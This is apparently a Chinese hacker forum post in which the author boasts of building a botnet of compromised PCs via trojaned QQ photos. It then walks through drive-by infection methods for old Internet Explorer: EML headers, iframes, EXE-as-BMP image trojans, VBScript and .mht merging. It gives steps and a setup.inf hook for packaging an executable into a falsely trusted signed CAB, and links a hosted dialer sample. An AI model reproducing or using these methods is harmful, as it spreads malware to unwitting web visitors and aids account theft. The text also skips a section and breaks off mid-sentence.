| 知道“大虾走门,菜鸟走窗”我说的。我是个菜菜鸟所以我知道这一
点,我是靠送别人礼物让她开窗来完成进入她家的。不像那些大虾直接进出
不用送东东,我有QQ发给“好友”带木的照片来完成进入,再由她机器收到
的QQ在发… 好累!有了些成就好像最多时有30多个肉鸡,但免费的空间要收
费了(免费餐不多了)几个星期的心血白费。主要是没有时间,还好上黑白上
看到了网页木马-图片木马,对我这样的菜鸟来说就是个天大的好事,放到网
页上成功。什么还有EML头啊太好了不用自己动手全搞定。时之不常我的肉鸡
又由多变少了为什么呢!到网吧一试才知道这全过时了,网吧装了金山防火和
还原精灵,一上网页就杀之!怎么办只有自己动手了!
一,EML头
“小弟前些天给我的QQ全没了”,“黑鸟大哥十几个全没了不会吧是不
是你的机器…”打车前去看了看,发现TEMP里有个EXE名为QQpass这不
是收QQ的东东,虽没用过非它不过了。“大哥,你常写信吗”“不啊,
为什么会被偷呢,我有防火墙呀是新买的”“不要让我来教你吧,你可
是我的老师,亡羊补牢你不知道吗?防是在发毒发之后不多说了,你要
不打个补丁,要不就卸了收信程序吧”
二,iframe
漏洞也不太会用,但看介绍还好用。
三,.EXE to .BMP + JS.Exception.EXploit
这就是图片木马吧,但我不喜欢JS,这种网虫页里的东东防火墙叫个不
停,还会驱走很多访客,黑下注册表肯定也会被人改回的,而后的.VBS
还会有什么用呢,它是在下次开机才运行的。但我喜欢做这个.BMP的那
个老师,原理是好的。(下面我用到了)
四,通过安全认证的CAB , COX
这使我这个菜菜鸟无能为力,百分百中招了,试求哪位大虾也帮我把我
的文件上签个微软的大名要年头长些的,要不老过期。
( 原理:IE读文件时会有文件读不出,就会去“升级”这样它会在网页中指定的位置找 .cab
并在系统里写入个CID读入 .cab 里的文件。
方法:.cab是WINDOWS里的压缩文件,我们知道IE里所用的安全文件是用签名的CAB也不例
外,所做的CAB是经过安全使用证书异入的。也就是说IE认证攻击,只所以每次都能
入侵我的脑,是因为它通过的是IE认证下的安全攻击,这样不管我怎么做都没办法。
制做方法:因本人水平有限(参)
软件:1.安全证书管理。 2.CAB压缩或安装盘制做
先到,IE里找安全-内容,里面有证书,我们找一个就行。导出 *.CER
在用证书管理打开*.CER 导出证书.SPC和密钥.PVK。
这样我们就可以做 .cab 了。
做一个setup.inf
[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\文件.exe
[Version]
Signature=$CHICAGO$
AdvancedInf=2.0
最重要我所用的是安装盘制做,ADD sdtup.inf OR 文件.exe
然后 导入证书.SPC和密钥.PVK。
实例在我的免费空间上不过下载的是成人拔号器千万别点
(合法的签名)是安全的
http://jzs.3322.net/live/index.html
六,VBScript
我想这是很多病毒最爱用的了不用多说吧网页和文件常用的语言。
七,综合所感优点组合
iframe 成两个窗,其一为.BMP+VBScript
其二为EML头的变种.mht(真对打了打补丁的不会做,可以用网页合并器合成)
实例没试过成功的话在桌面上多个“女友 |
